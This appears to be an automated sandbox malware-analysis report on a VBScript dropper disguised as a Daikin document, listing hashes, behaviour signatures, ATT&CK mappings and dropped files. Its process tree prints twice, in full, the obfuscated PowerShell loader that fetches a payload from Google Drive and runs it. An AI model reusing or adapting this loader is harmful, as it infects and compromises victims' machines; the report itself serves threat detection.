a1541e8095205c49f9943fa5bb38fb3601ea04e2bcaa2386b9d8850c677f924a

General

Target

DAIKIN AC SPAIN 2024.vbs
Size

8KB
MD5

edf7ea5f8de604b0caabc49fd06365b5
SHA1

1f6a6566a718b05572ddd239fb4aae1a629c2046
SHA256

a1541e8095205c49f9943fa5bb38fb3601ea04e2bcaa2386b9d8850c677f924a
SHA512

386e45884f032585937046e658ed47f772646ba94767c081d411e7cf3621fa264dd94a3e1bd764057d22dc1024b4e9da14dc49f888228fc76d61959de66c7bb9
SSDEEP

192:lLhK5s4cl1zdInbInx+VV/rOc3R9uAB8uaWUFiSoN7Sx6TYgWnXSt7qpnwxbuzkj:lLhK5hQz2n0u/yAR9nBbaB+FCuYgWXO9

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

13 3764 powershell.exe
32 3764 powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation WScript.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

11 drive.google.com
13 drive.google.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2156 4768 WerFault.exe powershell.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exe

pid process

3764 powershell.exe
3764 powershell.exe
4768 powershell.exe
4768 powershell.exe
4768 powershell.exe
4768 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 3764 powershell.exe
Token: SeDebugPrivilege 4768 powershell.exe

flow	pid	process
13	3764	powershell.exe
32	3764	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation	WScript.exe

flow	ioc
11	drive.google.com
13	drive.google.com

pid	pid_target	process	target process
2156	4768	WerFault.exe	powershell.exe

pid	process
3764	powershell.exe
3764	powershell.exe
4768	powershell.exe
4768	powershell.exe
4768	powershell.exe
4768	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3764	powershell.exe
Token: SeDebugPrivilege	4768	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 4488 wrote to memory of 3764	4488	WScript.exe	powershell.exe
PID 4488 wrote to memory of 3764	4488	WScript.exe	powershell.exe
PID 3764 wrote to memory of 1616	3764	powershell.exe	cmd.exe
PID 3764 wrote to memory of 1616	3764	powershell.exe	cmd.exe
PID 3764 wrote to memory of 4768	3764	powershell.exe	powershell.exe
PID 3764 wrote to memory of 4768	3764	powershell.exe	powershell.exe
PID 3764 wrote to memory of 4768	3764	powershell.exe	powershell.exe
PID 4768 wrote to memory of 3064	4768	powershell.exe	cmd.exe
PID 4768 wrote to memory of 3064	4768	powershell.exe	cmd.exe
PID 4768 wrote to memory of 3064	4768	powershell.exe	cmd.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DAIKIN AC SPAIN 2024.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4488

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$grovder = 1;$Datatypes='Substrin';$Datatypes+='g';Function Basalt($Jacobite){$Preallyingnlet171=$Jacobite.Length-$grovder;For($Preallying=5; $Preallying -lt $Preallyingnlet171; $Preallying+=(6)){$kbebens+=$Jacobite.$Datatypes.Invoke($Preallying, $grovder);}$kbebens;}function Rentricers($Cajolements){. ($Salified) ($Cajolements);}$Umaledes=Basalt 'CluntMSporao Regnz routiFl.dslpapirlS.leka Icho/Sa fu5Prepe.Acety0 .pti Nigh( .atrWMo,oriS,bspn ConcdRheino Berew Debas age R silNLaaneTVietc Tovb1Consa0Olief.Vejre0Victo;Ant m SharrW Endoi Fa.lnS,ned6Aande4F rre;Amts. BarmxCycli6 Chr,4S.iri;Skift MegasrHal,sv Sup.:Ev,ng1Forbe2 Genn1forud.Catec0Venst) Esti SrklaGEftereCountc,maglkFoderoTa,ja/C mpl2Ana.y0 ndel1Reemi0Posti0Ibr,d1 Sick0Trawl1 saky SubgeFSv,djiGastrrRasteeLokalf BrygoGe,anxMercu/ Sp r1 Et.n2Kinsw1 sta .neuro0 Blod ';$Virksomhedsgrupper=Basalt 'Mu,icUPerspsMisdeeMetafrEfter-LaaneAtroweg UdmeeBerolndespotMism. ';$Eksportpnr=Basalt 'VentehForcltexecrtBeha pFathes Sign:Pr fi/ Ang./Ca.erdRod rrPhytoiu convSlu be .ona.scha.g nortoOplagon balg redelReduce Wi g.Mollic wo doLagermLi,ks/ VegeuUnsa cBaggr?NoctueSli lxJomfrpIschooAllo.rTehsetBdefo= FormdOverroCiga,wBaratnNonsyl s mpomilliaOstredF,gen&TotriiCgilbdGebrk=,psyc1ForhaAPerseb wazieKaktuMTrvartAdamaLCystaUBeliguSamlesMakromAnlgsqDokumnFurro2generNTheolIWalleA philn .nfaxInd.eqCo,oirLrefo2Nona 7KalorKFilmkf ther6,ahoec.lulaT Uds _d.ckczPros,yPrikk4 Predi Toxa ';$Megans=Basalt 'Peber>Vejl, ';$Salified=Basalt ' Vddeiu,ilseDoserxKille ';$Sjaskets='Insensuous';Rentricers (Basalt '.itreSU bale MoodtPoori-ReverCLawino,onfinTartrt .enae ForsnRestltRacem Unbal-ForesP F.jlaIndust ubahAxol, HippuTspist:P ess\BrobaSGlamouGl.bun FlerbPhotooCollyn OtolnPt lieMy,sptStemms Dull.Oroa tno,prxAggertNonma Rehan- Sam.VAfstaaStemml restuGalvaeChlor Serie$Sor,kSMonosjKu.tuagymnas PentkTrosse.adavtguldgsRekvi; Seks ');Rentricers (Basalt 'DunkeiChlorf.urri Hypo(ejnertFlokdeAnti,sBystatForka- ariepCoempacindetKonveh B,re UnderTCyamo:Statu\FantaS Unheu HyponPteribomordoR latnAnsvancrafte GangtLaconsStyre.LoyaltTa.texBladstKri s).fstb{.ndereB sepxFremriT.ermtAdder}Unde,;.olum ');$Misstemninger = Basalt 'ZooloeAflurc ndkhReequopr.sb Midde%Konsia S,xopDehyppOmb,sdBurnoaKaffetTatova Lay.%Mesi \RestrCNegrooKanden DespfEndoci HaevdFligeaSundhnSolkrtc.arl. ClisAledennfichet Bi,l Threa&Criti&Hydro ,eavePorticcurvoh raftoBabes Pub.$Urinr ';Rentricers (Basalt 'Gafsk$ PringLabanlFallaoOut.abunrumaKumshl,arki:ArborU Fidep DetrdInflaaP,rtirLig,ttTauro= Pent( ibircFodermBar,td Hund C vil/ PartcDutch Sex,o$MonteMHo,mii PlassSurrasFlyset,rogreBathom .hefnRegnsiHistonH bbeg.arkaeCroisrGartn)Twist ');Rentricers (Basalt 'Dispo$seas.gSrejelGraf oGe,opbnonsiaTranslGenia:AarhuNDriftodyrevnDem cr MalveTack.gEnsidiEbenes,eatetMecharUngr,aafsp.bBarralSty,ae Judi=,endi$ReligEasperk Ajl.sKal.upAethooSengerVandrt SocipIntern AbsurUnbea.IsocesRespopTtpakl StoriFe,tdtBomba(Unsk.$PostoMWryrheFastegSkovvaUn.ernAntiksSubko) Fdev ');$Eksportpnr=$Nonregistrable[0];Rentricers (Basalt 'Lod.e$RetorgzophilDadeno.rystb Kla,a UudrlSubje: OptiSCarrieAleikr U skoRa.ics,redeaInfiln RikkgBssesuBrocaiMiscon oxineTamesoAbla,u GenasBaa,d=A.tioNNoviteAmi.ow.atur- PlanOindkbbDistrj ManueT.vercAquiltUran. B,riSOrganySlagss Ba dtOutd eUrgenmEpide.Re.isNPas,eeNedlatSynar. KompWForekeEksisbBedevCSpasmlLovliiAagr.e RetrnI,dfatForre ');Rentricers (Basalt 'Wilbu$ abi,S xtroeBrothr AttroSkraasFu ktaBrigansdemngKammeuReceniSikken InsieAfka,o Br guHaptosKilob.ServaHUdkoneFendea Kon dEmmene OsterEj,fasSked.[ slng$NoritV Pyg iChassr GloekIndkasFakuloIndermHa mehLat levalgcdDyestsSpnesg verir GeoluMokespHe.kupBrodeeNonh,r Sent]Brugh= Em e$WlatsULith mSuperaSu kelGebyreSvigtd umene StrisNonsk ');$Reordering=Basalt 'deducSKnal,eTapper tvleo Wak,sLogoraPlanlnDepergCeratuDatasiHype,nIsopee IncooRe niu MinesRaiae.He.ddDSc lloBlusnw MesonMi,rolIsoamo MultaDrmmedForweFPolitiVernelRomneeUdtyn(Disco$ArrowE Un.dkKurs.sOverlpRep,eo Humor .timtfa efpMicronCoxcor Prei,Nelum$ ultK RituoSpr,glEn,erkOb,seoNort z dmyytvan,)Affie ';$Reordering=$Updart[1]+$Reordering;$Kolkozy=$Updart[0];Rentricers (Basalt 'In ov$Lightg alerlBr.twoJera bFo.inaMelaglBundh:PolypABarrenLydlst,looviLashnt tibehSardieNondis Jo.iiI.osizforsieUdd,l=Bordv(PostvTFuld,eDobbessup,etWharh- ,otaPPatelaMa netBennehBlep. Glag$ S ovKKonveoOr.opl Unlok PeroopremazInureyprdis)Reval ');while (!$Antithesize) {Rentricers (Basalt 'Misth$Inf agToponlSierso DiffbSpgefa .nerlDaf,a: AsilGKristrApoteaLandrvM,ksirMarksuace asZoosptGane,= emen$RygtetProtorQuahauPr toeGaran ') ;Rentricers $Reordering;Rentricers (Basalt 'TrettSCorchtKonsuaBurgerBrinttEnlac-aabniSRestelModereReakteSalmopEt.op Nonfo4 ned. ');Rentricers (Basalt 'Sjals$FejlfgQuakilHalvfoPizzabF,rfaaCiseclVegne:DartfA SkatnAs.artOryxui,altetFornih AmiseMa.ilsAritmiUnc.mz Nybye .ffr=,roko( ApsiT HoreeCir.usRed.etAnod - JiggP.yresaProppt pulthTrett Omta,$TruxiKAntilo M,crl Spu kDrke.oMili.zdrifty Aer,) unde ') ;Rentricers (Basalt 'Tro d$KibsegTrisulUndisoDe.debFie,ca ArtilFortu:Eu,orBPe tae.ssesgnig,trinerui Sundb ArgueRensdlUkammiloc,rgUgudee Grun= Karm$No.bogtaberlpo,sgoPetrabTvangaEle,tlHy.en:F rreEPal,duStranrPolyty .cyjtsu.roh IndoeTrieqr CalimTaarnaBomullTrdep+Espar+Anutr%Rghtt$AdvocNDeflooHelotnSubs rTracaePrdisgIsogai PhyssTabultHyrderDishea lexabSkrivlCyprae Frit.U eticAf ynoBenefuBlrehnFl.odt T na ') ;$Eksportpnr=$Nonregistrable[$Begribelige];}Rentricers (Basalt ' Lais$Faglrg SponlPalamoHyperbAbscea D.vllsy,as:u.forMBrneiiudda.lkultuiGarveeParapuAlmueaPirkskPapertKa ebi KvinvArgeni FoursStrb tAnt.reSamohr,nfrasZutug Siks=Pulpi .reemGCouloe,atiotKonfl-SpongCOplsnoSkirrnOverstd.mrreuretfnPakettPrehu Oxyc$ChiliKWhe.toLder.lToughk Shalo.ecdezGazolyForbi ');Rentricers (Basalt '.rofa$ tinag AlewlR,sisoRaadibPigtaa,rbehlMarra:SlagmOParo,vFlerueArgenrUdfaltBeredrstudid Jacoe Subdn rmstdForpaePseud Impr.=Lat.e Nonre[ SubeSGurdyyskgpesOpiumtNewsreDistimCalla.Is,diCMngecoUd.annThralv,ampheO,zoorDorsitHamme]fast,:Scutu: HenvF,ressrBise oStetim KoreB .ndea Subrs CohieOpry.6Reku 4IndfaSel irtFyrrurhel.rialk,hnForargV,ngu(Tolyl$pikarMAnatei.ellbl SangiMo,kieAdhe u,hemoaAvowakStaaltPontiiMailev Noncianalys lvet .pireKullar DesesCatal)Outwo ');Rentricers (Basalt 'atmo $Staffg,ronel Und.o Chanb Dotha Su,nl Ddsl: tudeT HjreoFremmt UdyraBandelBla di ubbltRe.igeAlpintnephrePristnUndersminig C,kli=Udste Al.em[ angoSSandky,elansVulgrtBundre MortmSejlb.BradsTInd,neUredex Ura.t,enop.RetorE O.acnStrafcVilheoSttysd freti C.ranTrngtgF,itn]Comel:Struk:pollaAVegbeSHun.eCAm tiIPratiIP,olo.Mis,nG SupeeAnergtSalvaSS,aflt,eninr.tilliP.eudnInkapg Pize(F.kus$ palaOsupe.vTchadeLau.drbrachtLatinrs oradlumb.eC,ciln OmstdZoogreNeces)Ac.in ');Rentricers (Basalt 'Penta$Trichg eftelToleroRiotob De,aaBer.ele ike:D,adyKHovedoGarvenShruftStnkei albanTennie FabrnSubdutDe,dreKristtUpbro=sjleg$SafiaTEng.no pectDenara HusklForreichowstKontoeAnar,tF,ammeAnthrnProaps,odbi.trep,sLovovuMol lbpe,ursScrivt.rmekr.lieriEquiln ,nkegNonfa(navig3 S mi0 orsa2 Har.2Milie4Syedd8Caryo,S,ipp2Nulst7.erru7Refun8Lkker7P.enu) Arr, ');Rentricers $Kontinentet;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3764

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Confidant.Ant && echo $"
3⤵
PID:1616

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$grovder = 1;$Datatypes='Substrin';$Datatypes+='g';Function Basalt($Jacobite){$Preallyingnlet171=$Jacobite.Length-$grovder;For($Preallying=5; $Preallying -lt $Preallyingnlet171; $Preallying+=(6)){$kbebens+=$Jacobite.$Datatypes.Invoke($Preallying, $grovder);}$kbebens;}function Rentricers($Cajolements){. ($Salified) ($Cajolements);}$Umaledes=Basalt 'CluntMSporao Regnz routiFl.dslpapirlS.leka Icho/Sa fu5Prepe.Acety0 .pti Nigh( .atrWMo,oriS,bspn ConcdRheino Berew Debas age R silNLaaneTVietc Tovb1Consa0Olief.Vejre0Victo;Ant m SharrW Endoi Fa.lnS,ned6Aande4F rre;Amts. BarmxCycli6 Chr,4S.iri;Skift MegasrHal,sv Sup.:Ev,ng1Forbe2 Genn1forud.Catec0Venst) Esti SrklaGEftereCountc,maglkFoderoTa,ja/C mpl2Ana.y0 ndel1Reemi0Posti0Ibr,d1 Sick0Trawl1 saky SubgeFSv,djiGastrrRasteeLokalf BrygoGe,anxMercu/ Sp r1 Et.n2Kinsw1 sta .neuro0 Blod ';$Virksomhedsgrupper=Basalt 'Mu,icUPerspsMisdeeMetafrEfter-LaaneAtroweg UdmeeBerolndespotMism. ';$Eksportpnr=Basalt 'VentehForcltexecrtBeha pFathes Sign:Pr fi/ Ang./Ca.erdRod rrPhytoiu convSlu be .ona.scha.g nortoOplagon balg redelReduce Wi g.Mollic wo doLagermLi,ks/ VegeuUnsa cBaggr?NoctueSli lxJomfrpIschooAllo.rTehsetBdefo= FormdOverroCiga,wBaratnNonsyl s mpomilliaOstredF,gen&TotriiCgilbdGebrk=,psyc1ForhaAPerseb wazieKaktuMTrvartAdamaLCystaUBeliguSamlesMakromAnlgsqDokumnFurro2generNTheolIWalleA philn .nfaxInd.eqCo,oirLrefo2Nona 7KalorKFilmkf ther6,ahoec.lulaT Uds _d.ckczPros,yPrikk4 Predi Toxa ';$Megans=Basalt 'Peber>Vejl, ';$Salified=Basalt ' Vddeiu,ilseDoserxKille ';$Sjaskets='Insensuous';Rentricers (Basalt '.itreSU bale MoodtPoori-ReverCLawino,onfinTartrt .enae ForsnRestltRacem Unbal-ForesP F.jlaIndust ubahAxol, HippuTspist:P ess\BrobaSGlamouGl.bun FlerbPhotooCollyn OtolnPt lieMy,sptStemms Dull.Oroa tno,prxAggertNonma Rehan- Sam.VAfstaaStemml restuGalvaeChlor Serie$Sor,kSMonosjKu.tuagymnas PentkTrosse.adavtguldgsRekvi; Seks ');Rentricers (Basalt 'DunkeiChlorf.urri Hypo(ejnertFlokdeAnti,sBystatForka- ariepCoempacindetKonveh B,re UnderTCyamo:Statu\FantaS Unheu HyponPteribomordoR latnAnsvancrafte GangtLaconsStyre.LoyaltTa.texBladstKri s).fstb{.ndereB sepxFremriT.ermtAdder}Unde,;.olum ');$Misstemninger = Basalt 'ZooloeAflurc ndkhReequopr.sb Midde%Konsia S,xopDehyppOmb,sdBurnoaKaffetTatova Lay.%Mesi \RestrCNegrooKanden DespfEndoci HaevdFligeaSundhnSolkrtc.arl. ClisAledennfichet Bi,l Threa&Criti&Hydro ,eavePorticcurvoh raftoBabes Pub.$Urinr ';Rentricers (Basalt 'Gafsk$ PringLabanlFallaoOut.abunrumaKumshl,arki:ArborU Fidep DetrdInflaaP,rtirLig,ttTauro= Pent( ibircFodermBar,td Hund C vil/ PartcDutch Sex,o$MonteMHo,mii PlassSurrasFlyset,rogreBathom .hefnRegnsiHistonH bbeg.arkaeCroisrGartn)Twist ');Rentricers (Basalt 'Dispo$seas.gSrejelGraf oGe,opbnonsiaTranslGenia:AarhuNDriftodyrevnDem cr MalveTack.gEnsidiEbenes,eatetMecharUngr,aafsp.bBarralSty,ae Judi=,endi$ReligEasperk Ajl.sKal.upAethooSengerVandrt SocipIntern AbsurUnbea.IsocesRespopTtpakl StoriFe,tdtBomba(Unsk.$PostoMWryrheFastegSkovvaUn.ernAntiksSubko) Fdev ');$Eksportpnr=$Nonregistrable[0];Rentricers (Basalt 'Lod.e$RetorgzophilDadeno.rystb Kla,a UudrlSubje: OptiSCarrieAleikr U skoRa.ics,redeaInfiln RikkgBssesuBrocaiMiscon oxineTamesoAbla,u GenasBaa,d=A.tioNNoviteAmi.ow.atur- PlanOindkbbDistrj ManueT.vercAquiltUran. B,riSOrganySlagss Ba dtOutd eUrgenmEpide.Re.isNPas,eeNedlatSynar. KompWForekeEksisbBedevCSpasmlLovliiAagr.e RetrnI,dfatForre ');Rentricers (Basalt 'Wilbu$ abi,S xtroeBrothr AttroSkraasFu ktaBrigansdemngKammeuReceniSikken InsieAfka,o Br guHaptosKilob.ServaHUdkoneFendea Kon dEmmene OsterEj,fasSked.[ slng$NoritV Pyg iChassr GloekIndkasFakuloIndermHa mehLat levalgcdDyestsSpnesg verir GeoluMokespHe.kupBrodeeNonh,r Sent]Brugh= Em e$WlatsULith mSuperaSu kelGebyreSvigtd umene StrisNonsk ');$Reordering=Basalt 'deducSKnal,eTapper tvleo Wak,sLogoraPlanlnDepergCeratuDatasiHype,nIsopee IncooRe niu MinesRaiae.He.ddDSc lloBlusnw MesonMi,rolIsoamo MultaDrmmedForweFPolitiVernelRomneeUdtyn(Disco$ArrowE Un.dkKurs.sOverlpRep,eo Humor .timtfa efpMicronCoxcor Prei,Nelum$ ultK RituoSpr,glEn,erkOb,seoNort z dmyytvan,)Affie ';$Reordering=$Updart[1]+$Reordering;$Kolkozy=$Updart[0];Rentricers (Basalt 'In ov$Lightg alerlBr.twoJera bFo.inaMelaglBundh:PolypABarrenLydlst,looviLashnt tibehSardieNondis Jo.iiI.osizforsieUdd,l=Bordv(PostvTFuld,eDobbessup,etWharh- ,otaPPatelaMa netBennehBlep. Glag$ S ovKKonveoOr.opl Unlok PeroopremazInureyprdis)Reval ');while (!$Antithesize) {Rentricers (Basalt 'Misth$Inf agToponlSierso DiffbSpgefa .nerlDaf,a: AsilGKristrApoteaLandrvM,ksirMarksuace asZoosptGane,= emen$RygtetProtorQuahauPr toeGaran ') ;Rentricers $Reordering;Rentricers (Basalt 'TrettSCorchtKonsuaBurgerBrinttEnlac-aabniSRestelModereReakteSalmopEt.op Nonfo4 ned. ');Rentricers (Basalt 'Sjals$FejlfgQuakilHalvfoPizzabF,rfaaCiseclVegne:DartfA SkatnAs.artOryxui,altetFornih AmiseMa.ilsAritmiUnc.mz Nybye .ffr=,roko( ApsiT HoreeCir.usRed.etAnod - JiggP.yresaProppt pulthTrett Omta,$TruxiKAntilo M,crl Spu kDrke.oMili.zdrifty Aer,) unde ') ;Rentricers (Basalt 'Tro d$KibsegTrisulUndisoDe.debFie,ca ArtilFortu:Eu,orBPe tae.ssesgnig,trinerui Sundb ArgueRensdlUkammiloc,rgUgudee Grun= Karm$No.bogtaberlpo,sgoPetrabTvangaEle,tlHy.en:F rreEPal,duStranrPolyty .cyjtsu.roh IndoeTrieqr CalimTaarnaBomullTrdep+Espar+Anutr%Rghtt$AdvocNDeflooHelotnSubs rTracaePrdisgIsogai PhyssTabultHyrderDishea lexabSkrivlCyprae Frit.U eticAf ynoBenefuBlrehnFl.odt T na ') ;$Eksportpnr=$Nonregistrable[$Begribelige];}Rentricers (Basalt ' Lais$Faglrg SponlPalamoHyperbAbscea D.vllsy,as:u.forMBrneiiudda.lkultuiGarveeParapuAlmueaPirkskPapertKa ebi KvinvArgeni FoursStrb tAnt.reSamohr,nfrasZutug Siks=Pulpi .reemGCouloe,atiotKonfl-SpongCOplsnoSkirrnOverstd.mrreuretfnPakettPrehu Oxyc$ChiliKWhe.toLder.lToughk Shalo.ecdezGazolyForbi ');Rentricers (Basalt '.rofa$ tinag AlewlR,sisoRaadibPigtaa,rbehlMarra:SlagmOParo,vFlerueArgenrUdfaltBeredrstudid Jacoe Subdn rmstdForpaePseud Impr.=Lat.e Nonre[ SubeSGurdyyskgpesOpiumtNewsreDistimCalla.Is,diCMngecoUd.annThralv,ampheO,zoorDorsitHamme]fast,:Scutu: HenvF,ressrBise oStetim KoreB .ndea Subrs CohieOpry.6Reku 4IndfaSel irtFyrrurhel.rialk,hnForargV,ngu(Tolyl$pikarMAnatei.ellbl SangiMo,kieAdhe u,hemoaAvowakStaaltPontiiMailev Noncianalys lvet .pireKullar DesesCatal)Outwo ');Rentricers (Basalt 'atmo $Staffg,ronel Und.o Chanb Dotha Su,nl Ddsl: tudeT HjreoFremmt UdyraBandelBla di ubbltRe.igeAlpintnephrePristnUndersminig C,kli=Udste Al.em[ angoSSandky,elansVulgrtBundre MortmSejlb.BradsTInd,neUredex Ura.t,enop.RetorE O.acnStrafcVilheoSttysd freti C.ranTrngtgF,itn]Comel:Struk:pollaAVegbeSHun.eCAm tiIPratiIP,olo.Mis,nG SupeeAnergtSalvaSS,aflt,eninr.tilliP.eudnInkapg Pize(F.kus$ palaOsupe.vTchadeLau.drbrachtLatinrs oradlumb.eC,ciln OmstdZoogreNeces)Ac.in ');Rentricers (Basalt 'Penta$Trichg eftelToleroRiotob De,aaBer.ele ike:D,adyKHovedoGarvenShruftStnkei albanTennie FabrnSubdutDe,dreKristtUpbro=sjleg$SafiaTEng.no pectDenara HusklForreichowstKontoeAnar,tF,ammeAnthrnProaps,odbi.trep,sLovovuMol lbpe,ursScrivt.rmekr.lieriEquiln ,nkegNonfa(navig3 S mi0 orsa2 Har.2Milie4Syedd8Caryo,S,ipp2Nulst7.erru7Refun8Lkker7P.enu) Arr, ');Rentricers $Kontinentet;"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4768

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Confidant.Ant && echo $"
4⤵
PID:3064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4768 -s 2544
4⤵
- Program crash
PID:2156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4768 -ip 4768
1⤵
PID:4144

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4m41pkms.top.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Confidant.Ant
Filesize
429KB

MD5
a7895718bd45ce45ba841f5e01d0c2c8

SHA1
7c45d6f75a9c8634ea6df680913d27fda491e87c

SHA256
f9b4fe7fbf2153c8052c8a7857f97e4ba17d3a6b0a91c93f970e28c33d11f7c0

SHA512
5f873870d83484207019b9ec03237317dd988cbb4fe887ba47d4aebc2c0628926e3c9565d0078499236ac95dca9f40a2b3d13d12ceb952a3f6d38c39af85e27e

Download Submit
memory/3764-0-0x000001B35E7E0000-0x000001B35E802000-memory.dmp

Filesize
136KB

Download
memory/3764-11-0x000001B35E640000-0x000001B35E650000-memory.dmp

Filesize
64KB

Download
memory/3764-10-0x00007FFB57AD0000-0x00007FFB58591000-memory.dmp

Filesize
10.8MB

Download
memory/3764-12-0x000001B35E640000-0x000001B35E650000-memory.dmp

Filesize
64KB

Download
memory/3764-13-0x000001B35E640000-0x000001B35E650000-memory.dmp

Filesize
64KB

Download
memory/3764-45-0x00007FFB57AD0000-0x00007FFB58591000-memory.dmp

Filesize
10.8MB

Download
memory/4768-22-0x00000000055A0000-0x0000000005606000-memory.dmp

Filesize
408KB

Download
memory/4768-36-0x0000000007500000-0x0000000007B7A000-memory.dmp

Filesize
6.5MB

Download
memory/4768-20-0x0000000004F70000-0x0000000005598000-memory.dmp

Filesize
6.2MB

Download
memory/4768-21-0x0000000004EA0000-0x0000000004EC2000-memory.dmp

Filesize
136KB

Download
memory/4768-18-0x0000000004930000-0x0000000004940000-memory.dmp

Filesize
64KB

Download
memory/4768-23-0x0000000005610000-0x0000000005676000-memory.dmp

Filesize
408KB

Download
memory/4768-33-0x0000000005740000-0x0000000005A94000-memory.dmp

Filesize
3.3MB

Download
memory/4768-34-0x0000000005D70000-0x0000000005D8E000-memory.dmp

Filesize
120KB

Download
memory/4768-35-0x0000000005DB0000-0x0000000005DFC000-memory.dmp

Filesize
304KB

Download
memory/4768-19-0x0000000004930000-0x0000000004940000-memory.dmp

Filesize
64KB

Download
memory/4768-37-0x0000000006EC0000-0x0000000006EDA000-memory.dmp

Filesize
104KB

Download
memory/4768-38-0x0000000007020000-0x00000000070B6000-memory.dmp

Filesize
600KB

Download
memory/4768-39-0x0000000006F30000-0x0000000006F52000-memory.dmp

Filesize
136KB

Download
memory/4768-40-0x0000000008130000-0x00000000086D4000-memory.dmp

Filesize
5.6MB

Download
memory/4768-17-0x0000000074B00000-0x00000000752B0000-memory.dmp

Filesize
7.7MB

Download
memory/4768-42-0x0000000074B00000-0x00000000752B0000-memory.dmp

Filesize
7.7MB

Download
memory/4768-16-0x00000000047E0000-0x0000000004816000-memory.dmp

Filesize
216KB

Download

Analysis

Sharing